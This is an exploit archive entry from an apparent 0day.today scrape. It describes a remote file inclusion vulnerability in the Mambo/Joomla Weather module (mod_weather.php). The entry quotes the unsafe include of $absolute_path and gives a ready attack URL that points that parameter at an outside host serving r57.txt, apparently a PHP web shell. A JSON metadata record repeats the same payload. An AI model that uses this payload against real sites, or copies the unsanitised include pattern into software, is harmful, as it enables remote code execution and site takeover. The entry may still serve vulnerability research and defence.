ID 1337DAY-ID-1740
Type zdt
Reporter Cold Zero
Modified 2007-04-11T00:00:00
Description
Exploit for unknown platform in category web applications
======================================================
Mambo Module Weather (absolute_path) RFI Vulnerability
======================================================
============================================================
Mambo/Joomla Module Weather (absolute_path) Remote File include Vuln
============================================================
Script :
http://www.joomlaos.de/option,com_remository/Itemid,41/func,download/id,47/chk,a39037e15bb5cd125f3cfd9dccaec6f5/no_html,1.html
============================================================
File : /mod_weather.php
include($absolute_path.'/language/'.$lang.'/lang_mod_weather.php');
============================================================
http://site/{path}/modules/mod_weather.php?absolute_path=http://nachrichtenmann.de/r57.txt?
============================================================
# 0day.today [2018-03-14] #
{"id": "1337DAY-ID-1740", "lastseen": "2018-03-14T02:34:18", "viewCount": 5, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2018-03-14T02:34:18", "rev": 2}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-33426", "1337DAY-ID-27576"]}, {"type": "exploitdb", "idList": ["EDB-ID:47553"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:9F633F41C64CB6F19F95C80592ADA235"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/UNIX/WEBAPP/VICIDIAL_USER_AUTHORIZATION_UNAUTH_CMD_EXEC", "MSF:EXPLOIT/UNIX/MISC/POLYCOM_HDX_TRACEROUTE_EXEC", "MSF:EXPLOIT/UNIX/HTTP/PFSENSE_GROUP_MEMBER_EXEC", "MSF:EXPLOIT/WINDOWS/HTTP/DUPSCTS_BOF", "MSF:EXPLOIT/LINUX/HTTP/LOGSIGN_EXEC", "MSF:AUXILIARY/ADMIN/DNS/DYN_DNS_UPDATE", "MSF:AUXILIARY/SCANNER/HTTP/PHPMYADMIN_LOGIN", "MSF:AUXILIARY/SCANNER/HTTP/SURGENEWS_USER_CREDS", "MSF:EXPLOIT/UNIX/WEBAPP/PIWIK_SUPERUSER_PLUGIN_UPLOAD", "MSF:EXPLOIT/WINDOWS/HTTP/MANAGEENGINE_ADSHACLUSTER_RCE"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-4249.NASL"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4249-1:09206"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704249"]}, {"type": "mskb", "idList": ["KB3178710", "KB3115427", "KB3213555"]}], "modified": "2018-03-14T02:34:18", "rev": 2}, "vulnersScore": -0.4}, "type": "zdt", "sourceHref": "https://0day.today/exploit/1740", "description": "Exploit for unknown platform in category web applications", "title": "Mambo Module Weather (absolute_path) RFI Vulnerability", "cvelist": [], "sourceData": "======================================================\r\nMambo Module Weather (absolute_path) RFI Vulnerability\r\n======================================================\r\n\r\n\r\n\r\n============================================================\r\nMambo/Joomla Module Weather (absolute_path) Remote File include Vuln\r\n============================================================\r\nScript :\r\nhttp://www.joomlaos.de/option,com_remository/Itemid,41/func,download/id,47/chk,a39037e15bb5cd125f3cfd9dccaec6f5/no_html,1.html\r\n============================================================\r\nFile : /mod_weather.php\r\ninclude($absolute_path.'/language/'.$lang.'/lang_mod_weather.php');\r\n============================================================\r\nhttp://site/{path}/modules/mod_weather.php?absolute_path=http://nachrichtenmann.de/r57.txt?\r\n============================================================\r\n\r\n\r\n\n# 0day.today [2018-03-14] #", "published": "2007-04-11T00:00:00", "references": [], "reporter": "Cold Zero", "modified": "2007-04-11T00:00:00", "href": "https://0day.today/exploit/description/1740"}
{}
